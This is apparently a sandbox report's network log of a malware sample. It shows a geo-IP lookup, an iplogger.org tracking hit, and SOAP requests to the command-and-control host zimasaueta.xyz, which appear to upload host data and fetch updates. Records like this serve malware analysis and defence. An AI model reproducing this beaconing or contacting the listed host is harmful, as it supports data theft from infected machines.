Network Analysis

GET /geoip HTTP/1.1 Host: api.ip.sb Connection: Keep-Alive

HTTP/1.1 200 OK Date: Sat, 31 Jul 2021 04:44:44 GMT Content-Type: application/json; charset=utf-8 Content-Length: 347 Connection: keep-alive Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: no-cache Access-Control-Allow-Origin: * CF-Cache-Status: DYNAMIC Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wNkHf%2Bfy%2FPI0jPWKdMipkUhILTp5oOM%2B12JXck%2Fg8Isn5SNf%2FpAosKhGaWwGwqvtkl874vWTVg5hxhU1g7kXoeAiieO3Qzs%2FNEbxHtaZLgQ1dIe6n6GNUsYhcw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Server: cloudflare CF-RAY: 67742c59afbe0ce7-LAX alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400

GET /1RLxp7 HTTP/1.1 Host: iplogger.org Connection: Keep-Alive

HTTP/1.1 200 OK Server: nginx Date: Sat, 31 Jul 2021 04:44:51 GMT Content-Type: image/png Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=bf6j4r7l5toj6tas04s4hn1on5; path=/; HttpOnly Pragma: no-cache Set-Cookie: clhf03028ja=175.208.134.150; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=251341500; path=/ Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:01 GMT Answers: whoami: 2d939b5aee78649ba5dcf483ea0aaa5e19e86948b4778e339f04998c89927566 Strict-Transport-Security: max-age=31536000; preload X-Frame-Options: DENY

POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/CheckConnect" Host: zimasaueta.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive

HTTP/1.1 100 Continue

POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings" Host: zimasaueta.xyz Content-Length: 144 Expect: 100-continue Accept-Encoding: gzip, deflate

HTTP/1.1 100 Continue

POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment" Host: zimasaueta.xyz Content-Length: 6888 Expect: 100-continue Accept-Encoding: gzip, deflate

HTTP/1.1 100 Continue

POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetUpdates" Host: zimasaueta.xyz Content-Length: 6880 Expect: 100-continue Accept-Encoding: gzip, deflate

HTTP/1.1 100 Continue

POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/VerifyUpdate" Host: zimasaueta.xyz Content-Length: 6906 Expect: 100-continue Accept-Encoding: gzip, deflate

HTTP/1.1 100 Continue